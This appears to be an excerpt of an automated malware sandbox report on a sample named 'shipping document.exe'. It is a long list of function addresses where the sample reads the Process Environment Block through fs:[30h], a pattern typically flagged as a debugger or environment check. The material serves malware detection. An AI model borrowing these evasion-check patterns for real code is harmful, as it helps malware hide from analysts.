              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017683C0 mov eax, dword ptr fs:[00000030h]2_2_017683C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017683C0 mov eax, dword ptr fs:[00000030h]2_2_017683C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A3C0 mov eax, dword ptr fs:[00000030h]2_2_0176A3C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A3C0 mov eax, dword ptr fs:[00000030h]2_2_0176A3C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A3C0 mov eax, dword ptr fs:[00000030h]2_2_0176A3C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A3C0 mov eax, dword ptr fs:[00000030h]2_2_0176A3C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A3C0 mov eax, dword ptr fs:[00000030h]2_2_0176A3C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A3C0 mov eax, dword ptr fs:[00000030h]2_2_0176A3C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E63C0 mov eax, dword ptr fs:[00000030h]2_2_017E63C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0183634F mov eax, dword ptr fs:[00000030h]2_2_0183634F
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182A352 mov eax, dword ptr fs:[00000030h]2_2_0182A352
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01808350 mov ecx, dword ptr fs:[00000030h]2_2_01808350
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01758397 mov eax, dword ptr fs:[00000030h]2_2_01758397
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01758397 mov eax, dword ptr fs:[00000030h]2_2_01758397
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01758397 mov eax, dword ptr fs:[00000030h]2_2_01758397
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178438F mov eax, dword ptr fs:[00000030h]2_2_0178438F
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178438F mov eax, dword ptr fs:[00000030h]2_2_0178438F
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180437C mov eax, dword ptr fs:[00000030h]2_2_0180437C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175E388 mov eax, dword ptr fs:[00000030h]2_2_0175E388
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175E388 mov eax, dword ptr fs:[00000030h]2_2_0175E388
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175E388 mov eax, dword ptr fs:[00000030h]2_2_0175E388
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01764260 mov eax, dword ptr fs:[00000030h]2_2_01764260
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01764260 mov eax, dword ptr fs:[00000030h]2_2_01764260
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01764260 mov eax, dword ptr fs:[00000030h]2_2_01764260
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175826B mov eax, dword ptr fs:[00000030h]2_2_0175826B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175A250 mov eax, dword ptr fs:[00000030h]2_2_0175A250
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01766259 mov eax, dword ptr fs:[00000030h]2_2_01766259
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E8243 mov eax, dword ptr fs:[00000030h]2_2_017E8243
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E8243 mov ecx, dword ptr fs:[00000030h]2_2_017E8243
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175823B mov eax, dword ptr fs:[00000030h]2_2_0175823B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018362D6 mov eax, dword ptr fs:[00000030h]2_2_018362D6
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017702E1 mov eax, dword ptr fs:[00000030h]2_2_017702E1
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017702E1 mov eax, dword ptr fs:[00000030h]2_2_017702E1
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017702E1 mov eax, dword ptr fs:[00000030h]2_2_017702E1
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A2C3 mov eax, dword ptr fs:[00000030h]2_2_0176A2C3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A2C3 mov eax, dword ptr fs:[00000030h]2_2_0176A2C3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A2C3 mov eax, dword ptr fs:[00000030h]2_2_0176A2C3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A2C3 mov eax, dword ptr fs:[00000030h]2_2_0176A2C3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A2C3 mov eax, dword ptr fs:[00000030h]2_2_0176A2C3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0181A250 mov eax, dword ptr fs:[00000030h]2_2_0181A250
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0181A250 mov eax, dword ptr fs:[00000030h]2_2_0181A250
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017702A0 mov eax, dword ptr fs:[00000030h]2_2_017702A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017702A0 mov eax, dword ptr fs:[00000030h]2_2_017702A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0183625D mov eax, dword ptr fs:[00000030h]2_2_0183625D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F62A0 mov eax, dword ptr fs:[00000030h]2_2_017F62A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F62A0 mov ecx, dword ptr fs:[00000030h]2_2_017F62A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F62A0 mov eax, dword ptr fs:[00000030h]2_2_017F62A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F62A0 mov eax, dword ptr fs:[00000030h]2_2_017F62A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F62A0 mov eax, dword ptr fs:[00000030h]2_2_017F62A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F62A0 mov eax, dword ptr fs:[00000030h]2_2_017F62A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01810274 mov eax, dword ptr fs:[00000030h]2_2_01810274
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01810274 mov eax, dword ptr fs:[00000030h]2_2_01810274
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01810274 mov eax, dword ptr fs:[00000030h]2_2_01810274
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01810274 mov eax, dword ptr fs:[00000030h]2_2_01810274
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01810274 mov eax, dword ptr fs:[00000030h]2_2_01810274
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01810274 mov eax, dword ptr fs:[00000030h]2_2_01810274
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01810274 mov eax, dword ptr fs:[00000030h]2_2_01810274
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01810274 mov eax, dword ptr fs:[00000030h]2_2_01810274
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01810274 mov eax, dword ptr fs:[00000030h]2_2_01810274
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01810274 mov eax, dword ptr fs:[00000030h]2_2_01810274
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01810274 mov eax, dword ptr fs:[00000030h]2_2_01810274
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01810274 mov eax, dword ptr fs:[00000030h]2_2_01810274
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E0283 mov eax, dword ptr fs:[00000030h]2_2_017E0283
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E0283 mov eax, dword ptr fs:[00000030h]2_2_017E0283
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E0283 mov eax, dword ptr fs:[00000030h]2_2_017E0283
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E284 mov eax, dword ptr fs:[00000030h]2_2_0179E284
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E284 mov eax, dword ptr fs:[00000030h]2_2_0179E284
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179656A mov eax, dword ptr fs:[00000030h]2_2_0179656A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179656A mov eax, dword ptr fs:[00000030h]2_2_0179656A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179656A mov eax, dword ptr fs:[00000030h]2_2_0179656A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01768550 mov eax, dword ptr fs:[00000030h]2_2_01768550
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01768550 mov eax, dword ptr fs:[00000030h]2_2_01768550
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770535 mov eax, dword ptr fs:[00000030h]2_2_01770535
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770535 mov eax, dword ptr fs:[00000030h]2_2_01770535
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770535 mov eax, dword ptr fs:[00000030h]2_2_01770535
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770535 mov eax, dword ptr fs:[00000030h]2_2_01770535
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770535 mov eax, dword ptr fs:[00000030h]2_2_01770535
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770535 mov eax, dword ptr fs:[00000030h]2_2_01770535
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E53E mov eax, dword ptr fs:[00000030h]2_2_0178E53E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E53E mov eax, dword ptr fs:[00000030h]2_2_0178E53E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E53E mov eax, dword ptr fs:[00000030h]2_2_0178E53E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E53E mov eax, dword ptr fs:[00000030h]2_2_0178E53E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E53E mov eax, dword ptr fs:[00000030h]2_2_0178E53E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F6500 mov eax, dword ptr fs:[00000030h]2_2_017F6500
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834500 mov eax, dword ptr fs:[00000030h]2_2_01834500
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834500 mov eax, dword ptr fs:[00000030h]2_2_01834500
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834500 mov eax, dword ptr fs:[00000030h]2_2_01834500
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834500 mov eax, dword ptr fs:[00000030h]2_2_01834500
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834500 mov eax, dword ptr fs:[00000030h]2_2_01834500
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834500 mov eax, dword ptr fs:[00000030h]2_2_01834500
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834500 mov eax, dword ptr fs:[00000030h]2_2_01834500
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C5ED mov eax, dword ptr fs:[00000030h]2_2_0179C5ED
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C5ED mov eax, dword ptr fs:[00000030h]2_2_0179C5ED
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017625E0 mov eax, dword ptr fs:[00000030h]2_2_017625E0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E5E7 mov eax, dword ptr fs:[00000030h]2_2_0178E5E7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E5E7 mov eax, dword ptr fs:[00000030h]2_2_0178E5E7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E5E7 mov eax, dword ptr fs:[00000030h]2_2_0178E5E7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E5E7 mov eax, dword ptr fs:[00000030h]2_2_0178E5E7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E5E7 mov eax, dword ptr fs:[00000030h]2_2_0178E5E7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E5E7 mov eax, dword ptr fs:[00000030h]2_2_0178E5E7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E5E7 mov eax, dword ptr fs:[00000030h]2_2_0178E5E7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E5E7 mov eax, dword ptr fs:[00000030h]2_2_0178E5E7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017665D0 mov eax, dword ptr fs:[00000030h]2_2_017665D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A5D0 mov eax, dword ptr fs:[00000030h]2_2_0179A5D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A5D0 mov eax, dword ptr fs:[00000030h]2_2_0179A5D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E5CF mov eax, dword ptr fs:[00000030h]2_2_0179E5CF
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E5CF mov eax, dword ptr fs:[00000030h]2_2_0179E5CF
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017845B1 mov eax, dword ptr fs:[00000030h]2_2_017845B1
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017845B1 mov eax, dword ptr fs:[00000030h]2_2_017845B1
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E05A7 mov eax, dword ptr fs:[00000030h]2_2_017E05A7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E05A7 mov eax, dword ptr fs:[00000030h]2_2_017E05A7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E05A7 mov eax, dword ptr fs:[00000030h]2_2_017E05A7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E59C mov eax, dword ptr fs:[00000030h]2_2_0179E59C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01794588 mov eax, dword ptr fs:[00000030h]2_2_01794588
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01762582 mov eax, dword ptr fs:[00000030h]2_2_01762582
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01762582 mov ecx, dword ptr fs:[00000030h]2_2_01762582
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178A470 mov eax, dword ptr fs:[00000030h]2_2_0178A470
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178A470 mov eax, dword ptr fs:[00000030h]2_2_0178A470
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178A470 mov eax, dword ptr fs:[00000030h]2_2_0178A470
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0181A49A mov eax, dword ptr fs:[00000030h]2_2_0181A49A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EC460 mov ecx, dword ptr fs:[00000030h]2_2_017EC460
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178245A mov eax, dword ptr fs:[00000030h]2_2_0178245A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175645D mov eax, dword ptr fs:[00000030h]2_2_0175645D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E443 mov eax, dword ptr fs:[00000030h]2_2_0179E443
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175C427 mov eax, dword ptr fs:[00000030h]2_2_0175C427
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175E420 mov eax, dword ptr fs:[00000030h]2_2_0175E420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175E420 mov eax, dword ptr fs:[00000030h]2_2_0175E420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175E420 mov eax, dword ptr fs:[00000030h]2_2_0175E420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6420 mov eax, dword ptr fs:[00000030h]2_2_017E6420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01798402 mov eax, dword ptr fs:[00000030h]2_2_01798402
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01798402 mov eax, dword ptr fs:[00000030h]2_2_01798402
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01798402 mov eax, dword ptr fs:[00000030h]2_2_01798402
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017604E5 mov ecx, dword ptr fs:[00000030h]2_2_017604E5
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017944B0 mov ecx, dword ptr fs:[00000030h]2_2_017944B0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EA4B0 mov eax, dword ptr fs:[00000030h]2_2_017EA4B0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0181A456 mov eax, dword ptr fs:[00000030h]2_2_0181A456
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017664AB mov eax, dword ptr fs:[00000030h]2_2_017664AB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01768770 mov eax, dword ptr fs:[00000030h]2_2_01768770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770770 mov eax, dword ptr fs:[00000030h]2_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180678E mov eax, dword ptr fs:[00000030h]2_2_0180678E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018147A0 mov eax, dword ptr fs:[00000030h]2_2_018147A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EE75D mov eax, dword ptr fs:[00000030h]2_2_017EE75D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760750 mov eax, dword ptr fs:[00000030h]2_2_01760750
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2750 mov eax, dword ptr fs:[00000030h]2_2_017A2750
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2750 mov eax, dword ptr fs:[00000030h]2_2_017A2750
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E4755 mov eax, dword ptr fs:[00000030h]2_2_017E4755
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179674D mov esi, dword ptr fs:[00000030h]2_2_0179674D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179674D mov eax, dword ptr fs:[00000030h]2_2_0179674D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179674D mov eax, dword ptr fs:[00000030h]2_2_0179674D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179273C mov eax, dword ptr fs:[00000030h]2_2_0179273C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179273C mov ecx, dword ptr fs:[00000030h]2_2_0179273C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179273C mov eax, dword ptr fs:[00000030h]2_2_0179273C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DC730 mov eax, dword ptr fs:[00000030h]2_2_017DC730
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C720 mov eax, dword ptr fs:[00000030h]2_2_0179C720
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C720 mov eax, dword ptr fs:[00000030h]2_2_0179C720
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760710 mov eax, dword ptr fs:[00000030h]2_2_01760710
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01790710 mov eax, dword ptr fs:[00000030h]2_2_01790710
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C700 mov eax, dword ptr fs:[00000030h]2_2_0179C700
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017647FB mov eax, dword ptr fs:[00000030h]2_2_017647FB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017647FB mov eax, dword ptr fs:[00000030h]2_2_017647FB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017827ED mov eax, dword ptr fs:[00000030h]2_2_017827ED
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017827ED mov eax, dword ptr fs:[00000030h]2_2_017827ED
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017827ED mov eax, dword ptr fs:[00000030h]2_2_017827ED
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EE7E1 mov eax, dword ptr fs:[00000030h]2_2_017EE7E1
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176C7C0 mov eax, dword ptr fs:[00000030h]2_2_0176C7C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E07C3 mov eax, dword ptr fs:[00000030h]2_2_017E07C3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017607AF mov eax, dword ptr fs:[00000030h]2_2_017607AF
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01792674 mov eax, dword ptr fs:[00000030h]2_2_01792674
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A660 mov eax, dword ptr fs:[00000030h]2_2_0179A660
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A660 mov eax, dword ptr fs:[00000030h]2_2_0179A660
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177C640 mov eax, dword ptr fs:[00000030h]2_2_0177C640
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177E627 mov eax, dword ptr fs:[00000030h]2_2_0177E627
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01796620 mov eax, dword ptr fs:[00000030h]2_2_01796620
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01798620 mov eax, dword ptr fs:[00000030h]2_2_01798620
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176262C mov eax, dword ptr fs:[00000030h]2_2_0176262C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A2619 mov eax, dword ptr fs:[00000030h]2_2_017A2619
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE609 mov eax, dword ptr fs:[00000030h]2_2_017DE609
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE6F2 mov eax, dword ptr fs:[00000030h]2_2_017DE6F2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE6F2 mov eax, dword ptr fs:[00000030h]2_2_017DE6F2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE6F2 mov eax, dword ptr fs:[00000030h]2_2_017DE6F2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE6F2 mov eax, dword ptr fs:[00000030h]2_2_017DE6F2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E06F1 mov eax, dword ptr fs:[00000030h]2_2_017E06F1
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E06F1 mov eax, dword ptr fs:[00000030h]2_2_017E06F1
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0179A6C7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A6C7 mov eax, dword ptr fs:[00000030h]2_2_0179A6C7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017966B0 mov eax, dword ptr fs:[00000030h]2_2_017966B0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C6A6 mov eax, dword ptr fs:[00000030h]2_2_0179C6A6
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01764690 mov eax, dword ptr fs:[00000030h]2_2_01764690
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01764690 mov eax, dword ptr fs:[00000030h]2_2_01764690
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182866E mov eax, dword ptr fs:[00000030h]2_2_0182866E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182866E mov eax, dword ptr fs:[00000030h]2_2_0182866E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EC97C mov eax, dword ptr fs:[00000030h]2_2_017EC97C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A096E mov eax, dword ptr fs:[00000030h]2_2_017A096E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A096E mov edx, dword ptr fs:[00000030h]2_2_017A096E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A096E mov eax, dword ptr fs:[00000030h]2_2_017A096E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01786962 mov eax, dword ptr fs:[00000030h]2_2_01786962
